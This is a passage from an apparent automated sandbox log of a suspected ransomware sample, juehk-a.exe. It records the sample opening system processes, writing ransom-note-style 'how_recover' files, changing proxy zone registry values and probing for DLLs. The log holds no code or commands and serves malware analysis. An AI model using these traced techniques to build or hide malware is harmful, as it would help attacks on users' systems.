3937.              pid: 1092
3938.              imagepath: C:\Windows\explorer.exe
3939.              md5sum: ac4c51eb24aa95b77f705ab159189e24
3940.          source:
3941.            processinfo:
3942.              pid: 1648
3943.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3944.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3945.        process:
3946.          timestamp: 42432
3947.          mode: opened
3948.          sequenceNumber: 279
3949.          desiredaccess: 0x02000030
3950.          ntstatus: 0x00000000
3951.          target:
3952.            processinfo:
3953.              pid: 940
3954.              imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
3955.              md5sum: 619a67c9f617b7e69315bb28ecd5e1df
3956.          source:
3957.            processinfo:
3958.              pid: 1648
3959.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3960.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3961.        process:
3962.          timestamp: 42436
3963.          mode: opened
3964.          sequenceNumber: 280
3965.          desiredaccess: 0x02000030
3966.          ntstatus: 0x00000000
3967.          target:
3968.            processinfo:
3969.              pid: 1976
3970.              imagepath: C:\Program Files\Internet Explorer\iexplore.exe
3971.              md5sum: 0685765c0cbe095ba0c6c8790bae21ef
3972.          source:
3973.            processinfo:
3974.              pid: 1648
3975.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3976.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3977.        process:
3978.          timestamp: 42442
3979.          mode: opened
3980.          sequenceNumber: 281
3981.          desiredaccess: 0x02000030
3982.          ntstatus: 0xc0000022
3983.          target:
3984.            processinfo:
3985.              pid: 384
3986.              tid: 0
3987.              imagepath: N/A
3988.          source:
3989.            processinfo:
3990.              pid: 1648
3991.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3992.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3993.        process:
3994.          timestamp: 42446
3995.          mode: opened
3996.          sequenceNumber: 282
3997.          desiredaccess: 0x02000030
3998.          ntstatus: 0x00000000
3999.          target:
4000.            processinfo:
4001.              pid: 1460
4002.              imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
4003.              md5sum: c8a8321292a459b0a17fb39a782a5c74
4004.          source:
4005.            processinfo:
4006.              pid: 1648
4007.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4008.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4009.        process:
4010.          timestamp: 42454
4011.          mode: opened
4012.          sequenceNumber: 283
4013.          desiredaccess: 0x02000030
4014.          ntstatus: 0x00000000
4015.          target:
4016.            processinfo:
4017.              pid: 1312
4018.              imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
4019.              md5sum: c8a8321292a459b0a17fb39a782a5c74
4020.          source:
4021.            processinfo:
4022.              pid: 1648
4023.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4024.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4025.        process:
4026.          timestamp: 42467
4027.          mode: opened
4028.          sequenceNumber: 284
4029.          desiredaccess: 0x02000030
4030.          ntstatus: 0x00000000
4031.          target:
4032.            processinfo:
4033.              pid: 1324
4034.              imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
4035.              md5sum: 904e13ba41af2e353a32cf351ca53639
4036.          source:
4037.            processinfo:
4038.              pid: 1648
4039.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4040.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4041.        process:
4042.          timestamp: 42472
4043.          mode: opened
4044.          sequenceNumber: 285
4045.          desiredaccess: 0x02000030
4046.          ntstatus: 0x00000000
4047.          target:
4048.            processinfo:
4049.              pid: 1852
4050.              imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
4051.              md5sum: 904e13ba41af2e353a32cf351ca53639
4052.          source:
4053.            processinfo:
4054.              pid: 1648
4055.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4056.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4057.        process:
4058.          timestamp: 42477
4059.          mode: opened
4060.          sequenceNumber: 286
4061.          desiredaccess: 0x02000030
4062.          ntstatus: 0x00000000
4063.          target:
4064.            processinfo:
4065.              pid: 2152
4066.              imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
4067.              md5sum: 619a67c9f617b7e69315bb28ecd5e1df
4068.          source:
4069.            processinfo:
4070.              pid: 1648
4071.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4072.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4073.        process:
4074.          timestamp: 42521
4075.          mode: opened
4076.          sequenceNumber: 287
4077.          desiredaccess: 0x02000030
4078.          ntstatus: 0x00000000
4079.          target:
4080.            processinfo:
4081.              pid: 2320
4082.              imagepath: C:\Windows\System32\taskhost.exe
4083.              md5sum: 639774c9acd063f028f6084abf5593ad
4084.          source:
4085.            processinfo:
4086.              pid: 1648
4087.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4088.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4089.        file:
4090.          timestamp: 42526
4091.          mode: close
4092.          sequenceNumber: 288
4093.          value: C:\$Recycle.Bin\how_recover+deg.txt
4094.          filesize: 2673
4095.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
4096.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
4097.          processinfo:
4098.            pid: 1648
4099.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4100.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4101.            ads:
4102.          fid (ads:): 844424930231641
4103.          ntstatus: 0x0
4104.          CreateOptions: 0x0
4105.        file:
4106.          timestamp: 42530
4107.          mode: created
4108.          sequenceNumber: 289
4109.          value: C:\$Recycle.Bin\how_recover+deg.html
4110.          processinfo:
4111.            pid: 1648
4112.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4113.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4114.            ads:
4115.          fid (ads:): 562949953520986
4116.          ntstatus: 0x0
4117.          CreateOptions: 0x60
4118.        file:
4119.          timestamp: 42545
4120.          mode: close
4121.          sequenceNumber: 290
4122.          value: C:\$Recycle.Bin\how_recover+deg.html
4123.          filesize: 9480
4124.          md5sum: a68c3caf0be8f1a393c697136926cfd4
4125.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
4126.          processinfo:
4127.            pid: 1648
4128.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4129.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4130.            ads:
4131.          fid (ads:): 562949953520986
4132.          ntstatus: 0x0
4133.          CreateOptions: 0x0
4134.        apicall:
4135.          timestamp: 42205
4136.          sequenceNumber: 291
4137.          processinfo:
4138.            pid: 1648
4139.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4140.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4141.          dllname: kernel32.dll
4142.          apiname: GetSystemDirectoryW
4143.          address: 0x77179cce
4144.          params:
4145.            param (id:1): 0x2fff6cc
4146.            param (id:2): 260
4147.        apicall:
4148.          timestamp: 42245
4149.          sequenceNumber: 292
4150.          processinfo:
4151.            pid: 1648
4152.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4153.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4154.          dllname: kernel32.dll
4155.          apiname: GetSystemDirectoryW
4156.          address: 0x743b56d4
4157.          params:
4158.            param (id:1): 0x294ec30
4159.            param (id:2): 260
4160.        apicall:
4161.          timestamp: 42274
4162.          sequenceNumber: 293
4163.          processinfo:
4164.            pid: 1648
4165.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4166.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4167.          dllname: kernel32.dll
4168.          apiname: GetSystemDirectoryW
4169.          address: 0x743b56d4
4170.          params:
4171.            param (id:1): 0x294ebf8
4172.            param (id:2): 260
4173.        file:
4174.          timestamp: 42574
4175.          mode: failed
4176.          sequenceNumber: 294
4177.          value: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches
4178.          processinfo:
4179.            pid: 1648
4180.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4181.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4182.            ads:
4183.          fid (ads:): 0
4184.          failure: created
4185.          ntstatus: 0xc0000035
4186.          CreateOptions: 0x200021
4187.        file:
4188.          timestamp: 42579
4189.          mode: failed
4190.          sequenceNumber: 295
4191.          value: C:\Users\Administrator\AppData\Roaming\NTMARTA.DLL
4192.          processinfo:
4193.            tainted: true
4194.            pid: 1648
4195.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4196.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4197.            ads:
4198.          fid (ads:): 0
4199.          failure: open
4200.          ntstatus: 0xc0000034
4201.          CreateOptions: 0x200000
4202.          PE:
4203.            InspectionType: Ext
4204.        file:
4205.          timestamp: 42584
4206.          mode: failed
4207.          sequenceNumber: 296
4208.          value: C:\Users\Administrator\AppData\Roaming\IPHLPAPI.DLL
4209.          processinfo:
4210.            tainted: true
4211.            pid: 1648
4212.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4213.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4214.            ads:
4215.          fid (ads:): 0
4216.          failure: open
4217.          ntstatus: 0xc0000034
4218.          CreateOptions: 0x200000
4219.          PE:
4220.            InspectionType: Ext
4221.        file:
4222.          timestamp: 42588
4223.          mode: failed
4224.          sequenceNumber: 297
4225.          value: C:\Users\Administrator\AppData\Roaming\WINNSI.DLL
4226.          processinfo:
4227.            tainted: true
4228.            pid: 1648
4229.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4230.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4231.            ads:
4232.          fid (ads:): 0
4233.          failure: open
4234.          ntstatus: 0xc0000034
4235.          CreateOptions: 0x200000
4236.          PE:
4237.            InspectionType: Ext
4238.        file:
4239.          timestamp: 42593
4240.          mode: failed
4241.          sequenceNumber: 298
4242.          value: C:\Users\Administrator\AppData\Roaming\API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL
4243.          processinfo:
4244.            tainted: true
4245.            pid: 1648
4246.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4247.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4248.            ads:
4249.          fid (ads:): 0
4250.          failure: open
4251.          ntstatus: 0xc0000034
4252.          CreateOptions: 0x200000
4253.          PE:
4254.            InspectionType: Ext
4255.        mutex:
4256.          timestamp: 42373
4257.          sequenceNumber: 299
4258.          value: \Sessions\1\BaseNamedObjects\ZonesCacheCounterMutex
4259.          processinfo:
4260.            pid: 1648
4261.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4262.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4263.        regkey:
4264.          timestamp: 42373
4265.          mode: deleteval
4266.          sequenceNumber: 300
4267.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
4268.           processinfo:
4269.             pid: 1648
4270.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4271.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4272.         regkey:
4273.           timestamp: 42373
4274.           mode: deleteval
4275.           sequenceNumber: 301
4276.           value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
4277.          processinfo:
4278.            pid: 1648
4279.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4280.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4281.        regkey:
4282.          timestamp: 42373
4283.          mode: deleteval
4284.          sequenceNumber: 302
4285.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
4286.           processinfo:
4287.             pid: 1648
4288.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4289.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4290.         regkey:
4291.           timestamp: 42373
4292.           mode: deleteval
4293.           sequenceNumber: 303
4294.           value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
4295.          processinfo:
4296.            pid: 1648
4297.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4298.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4299.        regkey:
4300.          timestamp: 42373
4301.          mode: setval
4302.          sequenceNumber: 304
4303.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
4304.           processinfo:
4305.             pid: 1648
4306.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4307.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4308.         regkey:
4309.           timestamp: 42374
4310.           mode: setval
4311.           sequenceNumber: 305
4312.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
4313.          processinfo:
4314.            pid: 1648
4315.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4316.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4317.        mutex:
4318.          timestamp: 42374
4319.          sequenceNumber: 306
4320.          value: \Sessions\1\BaseNamedObjects\ZonesLockedCacheCounterMutex
4321.          processinfo:
4322.            pid: 1648
4323.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4324.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4325.        regkey:
4326.          timestamp: 42374
4327.          mode: deleteval
4328.          sequenceNumber: 307
4329.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
4330.           processinfo:
4331.             pid: 1648
4332.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4333.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4334.         regkey:
4335.           timestamp: 42374
4336.           mode: deleteval
4337.           sequenceNumber: 308
4338.           value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
4339.          processinfo:
4340.            pid: 1648
4341.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4342.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4343.        regkey:
4344.          timestamp: 42378
4345.          mode: deleteval
4346.          sequenceNumber: 309
4347.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
4348.           processinfo:
4349.             pid: 1648
4350.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4351.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4352.         regkey:
4353.           timestamp: 42378
4354.           mode: deleteval
4355.           sequenceNumber: 310
4356.           value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
4357.          processinfo:
4358.            pid: 1648
4359.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4360.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4361.        regkey:
4362.          timestamp: 42378
4363.          mode: setval
4364.          sequenceNumber: 311
4365.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
4366.           processinfo:
4367.             pid: 1648
4368.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4369.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4370.         regkey:
4371.           timestamp: 42378
4372.           mode: setval
4373.           sequenceNumber: 312
4374.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
4375.          processinfo:
4376.            pid: 1648
4377.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4378.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4379.        process:
4380.          timestamp: 42771
4381.          mode: opened
4382.          sequenceNumber: 313
4383.          desiredaccess: 0x02000030
4384.          ntstatus: 0xc0000022
4385.          target:
4386.            processinfo:
4387.              pid: 4
4388.              tid: 0
4389.              imagepath: N/A
4390.          source:
4391.            processinfo:
4392.              pid: 1648
4393.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4394.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4395.        process:
4396.          timestamp: 42775
4397.          mode: opened
4398.          sequenceNumber: 314
4399.          desiredaccess: 0x02000030
4400.          ntstatus: 0x00000000
4401.          target:
4402.            processinfo:
4403.              pid: 264
4404.              imagepath: C:\Windows\System32\smss.exe
4405.              md5sum: 1911a3356fa3f77ccc825ccbac038c2a
4406.          source:
4407.            processinfo:
4408.              pid: 1648
4409.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4410.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4411.        process:
4412.          timestamp: 42779
4413.          mode: opened
4414.          sequenceNumber: 315
4415.          desiredaccess: 0x02000030
4416.          ntstatus: 0x00000000
4417.          target:
4418.            processinfo:
4419.              pid: 348
4420.              imagepath: C:\Windows\System32\csrss.exe
4421.              md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
4422.          source:
4423.            processinfo:
4424.              pid: 1648
4425.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4426.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4427.        process:
4428.          timestamp: 42784
4429.          mode: opened
4430.          sequenceNumber: 316
4431.          desiredaccess: 0x02000030
4432.          ntstatus: 0x00000000
4433.          target:
4434.            processinfo:
4435.              pid: 376
4436.              imagepath: C:\Windows\System32\wininit.exe
4437.              md5sum: 94355c28c1970635a31b3fe52eb7ceba
4438.          source:
4439.            processinfo:
4440.              pid: 1648
4441.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4442.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4443.        process:
4444.          timestamp: 42790
4445.          mode: opened
4446.          sequenceNumber: 317
4447.          desiredaccess: 0x02000030
4448.          ntstatus: 0x00000000
4449.          target:
4450.            processinfo:
4451.              pid: 396
4452.              imagepath: C:\Windows\System32\csrss.exe
4453.              md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
4454.          source:
4455.            processinfo:
4456.              pid: 1648
4457.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4458.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4459.        process:
4460.          timestamp: 42795
4461.          mode: opened
4462.          sequenceNumber: 318
4463.          desiredaccess: 0x02000030
4464.          ntstatus: 0x00000000
4465.          target:
4466.            processinfo:
4467.              pid: 432
4468.              imagepath: C:\Windows\System32\winlogon.exe
4469.              md5sum: 1151b1baa6f350b1db6598e0fea7c457
4470.          source:
4471.            processinfo:
4472.              pid: 1648
4473.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4474.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4475.        process:
4476.          timestamp: 42800
4477.          mode: opened
4478.          sequenceNumber: 319
4479.          desiredaccess: 0x02000030
4480.          ntstatus: 0x00000000
4481.          target:
4482.            processinfo:
4483.              pid: 476
4484.              imagepath: C:\Windows\System32\services.exe
4485.              md5sum: 24acb7e5be595468e3b9aa488b9b4fcb
4486.          source:
4487.            processinfo:
4488.              pid: 1648
4489.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4490.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4491.        process:
4492.          timestamp: 42804
4493.          mode: opened
4494.          sequenceNumber: 320
4495.          desiredaccess: 0x02000030
4496.          ntstatus: 0x00000000
4497.          target:
4498.            processinfo:
4499.              pid: 492
4500.              imagepath: C:\Windows\System32\lsass.exe
4501.              md5sum: 0793f40b9b8a1bdd266296409dbd91ea
4502.          source:
4503.            processinfo:
4504.              pid: 1648
4505.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4506.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4507.        process:
4508.          timestamp: 42813
4509.          mode: opened
4510.          sequenceNumber: 321
4511.          desiredaccess: 0x02000030
4512.          ntstatus: 0x00000000
4513.          target:
4514.            processinfo:
4515.              pid: 500
4516.              imagepath: C:\Windows\System32\lsm.exe
4517.              md5sum: 9662ee182644511439f1c53745dc1c88
4518.          source:
4519.            processinfo:
4520.              pid: 1648
4521.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4522.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4523.        process:
4524.          timestamp: 42818
4525.          mode: opened
4526.          sequenceNumber: 322
4527.          desiredaccess: 0x02000030
4528.          ntstatus: 0x00000000
4529.          target:
4530.            processinfo:
4531.              pid: 612
4532.              imagepath: C:\Windows\System32\svchost.exe
4533.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
4534.          source:
4535.            processinfo:
4536.              pid: 1648
4537.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4538.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4539.        process:
4540.          timestamp: 42822
4541.          mode: opened
4542.          sequenceNumber: 323
4543.          desiredaccess: 0x02000030
4544.          ntstatus: 0x00000000
4545.          target:
4546.            processinfo:
4547.              pid: 684
4548.              imagepath: C:\Windows\System32\svchost.exe
4549.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
4550.          source:
4551.            processinfo:
4552.              pid: 1648
4553.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4554.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4555.        process:
4556.          timestamp: 42827
4557.          mode: opened
4558.          sequenceNumber: 324
4559.          desiredaccess: 0x02000030
4560.          ntstatus: 0x00000000
4561.          target:
4562.            processinfo:
4563.              pid: 756
4564.              imagepath: C:\Windows\System32\svchost.exe
4565.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
4566.          source:
4567.            processinfo:
4568.              pid: 1648
4569.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4570.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4571.        process:
4572.          timestamp: 42849
4573.          mode: opened
4574.          sequenceNumber: 325
4575.          desiredaccess: 0x02000030
4576.          ntstatus: 0x00000000
4577.          target:
4578.            processinfo:
4579.              pid: 828
4580.              imagepath: C:\Windows\System32\svchost.exe
4581.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
4582.          source:
4583.            processinfo:
4584.              pid: 1648
4585.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4586.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4587.        process:
4588.          timestamp: 42890
4589.          mode: opened
4590.          sequenceNumber: 326
4591.          desiredaccess: 0x02000030
4592.          ntstatus: 0x00000000
4593.          target:
4594.            processinfo:
4595.              pid: 868
4596.              imagepath: C:\Windows\System32\svchost.exe
4597.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
4598.          source:
4599.            processinfo:
4600.              pid: 1648
4601.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4602.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4603.        process:
4604.          timestamp: 42926
4605.          mode: opened
4606.          sequenceNumber: 327
4607.          desiredaccess: 0x02000030
4608.          ntstatus: 0x00000000
4609.          target:
4610.            processinfo:
4611.              pid: 904
4612.              imagepath: C:\Windows\System32\svchost.exe
4613.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
4614.          source:
4615.            processinfo:
4616.              pid: 1648
4617.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4618.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4619.        process:
4620.          timestamp: 42931
4621.          mode: opened
4622.          sequenceNumber: 328
4623.          desiredaccess: 0x02000030
4624.          ntstatus: 0x00000000
4625.          target:
4626.            processinfo:
4627.              pid: 968
4628.              imagepath: C:\Windows\System32\spoolsv.exe
4629.              md5sum: b96c17b5dc1424d56eea3a99e97428cd
4630.          source:
4631.            processinfo:
4632.              pid: 1648
4633.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4634.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4635.        process:
4636.          timestamp: 42953
4637.          mode: opened
4638.          sequenceNumber: 329
4639.          desiredaccess: 0x02000030
4640.          ntstatus: 0x00000000
4641.          target:
4642.            processinfo:
4643.              pid: 1064
4644.              imagepath: C:\Windows\System32\svchost.exe
4645.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
4646.          source:
4647.            processinfo:
4648.              pid: 1648
4649.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4650.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4651.        process:
4652.          timestamp: 42958
4653.          mode: opened
4654.          sequenceNumber: 330
4655.          desiredaccess: 0x02000030
4656.          ntstatus: 0x00000000
4657.          target:
4658.            processinfo:
4659.              pid: 1164
4660.              imagepath: C:\Windows\System32\taskhost.exe
4661.              md5sum: 639774c9acd063f028f6084abf5593ad
4662.          source:
4663.            processinfo:
4664.              pid: 1648
4665.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4666.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4667.        process:
4668.          timestamp: 42962
4669.          mode: opened
4670.          sequenceNumber: 331
4671.          desiredaccess: 0x02000030
4672.          ntstatus: 0x00000000
4673.          target:
4674.            processinfo:
4675.              pid: 1244
4676.              imagepath: C:\Windows\System32\dwm.exe
4677.              md5sum: f162d5f5e845b9dc352dd1bad8cef1bc
4678.          source:
4679.            processinfo:
4680.              pid: 1648
4681.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4682.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4683.        process:
4684.          timestamp: 42979
4685.          mode: opened
4686.          sequenceNumber: 332
4687.          desiredaccess: 0x02000030
4688.          ntstatus: 0x00000000
4689.          target:
4690.            processinfo:
4691.              pid: 1340
4692.              imagepath: C:\Windows\System32\svchost.exe
4693.              md5sum: c78655bc80301d76ed4fef1c1ea40a7d
4694.          source:
4695.            processinfo:
4696.              pid: 1648
4697.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4698.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4699.        process:
4700.          timestamp: 43016
4701.          mode: opened
4702.          sequenceNumber: 333
4703.          desiredaccess: 0x02000030
4704.          ntstatus: 0x00000000
4705.          target:
4706.            processinfo:
4707.              pid: 1092
4708.              imagepath: C:\Windows\explorer.exe
4709.              md5sum: ac4c51eb24aa95b77f705ab159189e24
4710.          source:
4711.            processinfo:
4712.              pid: 1648
4713.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4714.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4715.        process:
4716.          timestamp: 43020
4717.          mode: opened
4718.          sequenceNumber: 334
4719.          desiredaccess: 0x02000030
4720.          ntstatus: 0x00000000
4721.          target:
4722.            processinfo:
4723.              pid: 940
4724.              imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
4725.              md5sum: 619a67c9f617b7e69315bb28ecd5e1df
4726.          source:
4727.            processinfo:
4728.              pid: 1648
4729.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4730.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4731.        process:
4732.          timestamp: 43025
4733.          mode: opened
4734.          sequenceNumber: 335
4735.          desiredaccess: 0x02000030
4736.          ntstatus: 0x00000000
4737.          target:
4738.            processinfo:
4739.              pid: 1976
4740.              imagepath: C:\Program Files\Internet Explorer\iexplore.exe
4741.              md5sum: 0685765c0cbe095ba0c6c8790bae21ef
4742.          source:
4743.            processinfo:
4744.              pid: 1648
4745.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4746.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4747.        process:
4748.          timestamp: 43040
4749.          mode: opened
4750.          sequenceNumber: 336
4751.          desiredaccess: 0x02000030
4752.          ntstatus: 0xc0000022
4753.          target:
4754.            processinfo:
4755.              pid: 384
4756.              tid: 0
4757.              imagepath: N/A
4758.          source:
4759.            processinfo:
4760.              pid: 1648
4761.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4762.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4763.        process:
4764.          timestamp: 43073
4765.          mode: opened
4766.          sequenceNumber: 337
4767.          desiredaccess: 0x02000030
4768.          ntstatus: 0x00000000
4769.          target:
4770.            processinfo:
